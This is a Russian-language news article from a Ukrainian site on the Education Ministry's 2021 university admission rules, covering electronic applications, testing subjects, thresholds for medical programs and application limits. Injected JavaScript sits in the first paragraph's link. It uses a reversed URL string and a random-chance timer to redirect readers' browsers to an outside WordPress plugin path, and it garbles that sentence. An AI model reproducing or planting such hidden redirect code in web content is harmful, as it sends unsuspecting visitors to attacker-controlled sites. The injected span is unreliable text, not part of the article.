НовиниВступительная кампания-2021: привила приёма

Вступительная кампания-2021: привила приёма

-

Вступительная кампания-2021: привила приёма

Александра Ган

Министерство образования и науки утвердило условия приема в вузы на 2021 год. Об этом в четверг, 15 октября, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobuttya-vishoyi-osviti-u-2021-roci” target=”_blank” rel=”nofollow noopener noreferrer”>сообщила пресс-служба МОН.

Следующую вступительную кампанию планируется провести в июле 2021 года.

“Поскольку еще не известно, как будет развиваться ситуация с распространением коронавируса, почти все поступающие смогут подавать заявления в электронном виде”, – отметил исполняющий обязанности министра образования Сергей Шкарлет.

Для регистрации электронного кабинета необходимо иметь хотя бы один сертификат внешнего независимого оценивания и документ о полном общем среднем образовании, изготовленный в Украине.

Кроме того, в следующем году для большинства специальностей будет значительно расширен перечень предметов ВНО, которые могут использоваться как третий конкурсный предмет. Для абитуриентов, поступающих на специальности гуманитарного и социального направления обязательным останется ВНО по украинскому языку и литературе.

Как и в прошлые годы, поступающим на врачебные специальности (“Стоматология”, “Медицина”, “Педиатрия”) нужно набрать не менее 150 баллов по второму и третьему конкурсным предметам. Обязательными предметами ВНО для будущих медиков являются украинский язык и математика, а третьим предметом можно выбрать биологию, химию или физику.

Также установлено ограничение количества заявлений. Поступающий сможет подать на контракт не более 30 заявлений.

Нововведение появилось и для абитуриентов магистратуры – поступающие всех специальностей должны будут сдавать единственный вступительный экзамен по иностранному языку (ЕВЭ).

До 31 декабря 2020 года все высшие учебные заведения должны утвердить и опубликовать свои правила приема.

 

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам